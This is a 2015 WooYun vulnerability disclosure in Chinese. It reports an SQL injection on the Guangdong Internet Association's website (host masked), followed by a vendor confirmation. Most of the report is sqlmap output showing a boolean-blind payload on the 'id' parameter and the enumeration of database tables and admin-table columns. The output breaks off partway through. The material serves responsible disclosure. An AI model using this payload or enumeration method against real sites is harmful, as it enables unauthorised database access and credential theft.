当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141620

漏洞标题:广东省互联网协会存在SQL注入漏洞数据库多表信息暴露

相关厂商:广东省互联网协会

漏洞作者: 衣其

提交时间:2015-09-16 18:50

修复时间:2015-11-05 10:04

公开时间:2015-11-05 10:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

如题

详细说明:

http://**.**.**.**/admin/newstext.asp?id=524

漏洞证明:

sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://**.**.**.**
[*] starting at: 14:41:49
[14:41:49] [INFO] using 'D:\Python27\sqlmap\output\**.**.**.**\session' as session file
[14:41:49] [INFO] resuming injection data from session file
[14:41:49] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[14:41:49] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=524 AND 923=923
---
[14:41:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[14:41:59] [INFO] fetching database names
[14:41:59] [INFO] fetching number of databases
[14:41:59] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session':
[14:41:59] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session':
[14:41:59] [INFO] retrieved:
[14:42:26] [ERROR] unable to retrieve the number of databases
[14:42:26] [INFO] falling back to current database
[14:42:26] [INFO] fetching current database
[14:42:26] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session': gdis
available databases [1]:
[*] gdis
[14:42:26] [INFO] fetching tables for database 'gdis'
[14:42:26] [INFO] fetching number of tables for database 'gdis'
[14:42:26] [INFO] retrieved: 9
[14:43:32] [INFO] retrieved: dbo.Aclass
[14:55:46] [INFO] retrieved: dbo.Aclass_link
[15:04:03] [INFO] retrieved: dbo.Aclass_member
[15:13:47] [INFO] retrieved: dbo[15:15:07] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
.admin
[15:22:32] [INFO] retrieved: dbo.article
[15:32:44] [INFO] retrieved: dbo.article_link
[15:41:21] [INFO] retrieved: dbo.article_member
[15:51:43] [INFO] retrieved: dbo.dtproperties
[16:07:28] [INFO] retrieved: dbo.img
Database: gdis
[9 tables]
+--------------------+
| dbo.Aclass         |
| dbo.Aclass_link    |
| dbo.Aclass_member  |
| dbo.admin          |
| dbo.article        |
| dbo.article_link   |
| dbo.article_member |
| dbo.dtproperties   |
| dbo.img            |
+--------------------+
[16:13:32] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\**.**.**.**'
[*] shutting down at: 16:13:32


sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://**.**.**.**
[*] starting at: 16:27:36
[16:27:36] [INFO] using 'D:\Python27\sqlmap\output\**.**.**.**\session' as session file
[16:27:36] [INFO] resuming injection data from session file
[16:27:36] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[16:27:37] [INFO] testing connection to the target url
                                                                                sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=524 AND 923=923
---
[16:27:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[16:27:46] [INFO] fetching columns for table 'dbo.admin' on database 'gdis'
[16:27:46] [INFO] fetching number of columns for table 'dbo.admin' on database 'gdis'
[16:27:46] [INFO] retrieved: 8
[16:28:55] [INFO] retrieved: CompanyName
[16:42:59] [INFO] retrieved: nvarchar
[16:53:10] [INFO] retrieved: flag
[16:58:59] [INFO] retrieved: int
[17:03:33] [INFO] retrieved: id
[17:07:00] [INFO] retrieved: int
[17:11:34] [INFO] retrieved: name
[17:17:24] [INFO] retrieved: nvarchar
[17:27:51] [INFO] retrieved: pa

修复方案:

过滤

版权声明:转载请注明来源 衣其@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-21 10:03

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无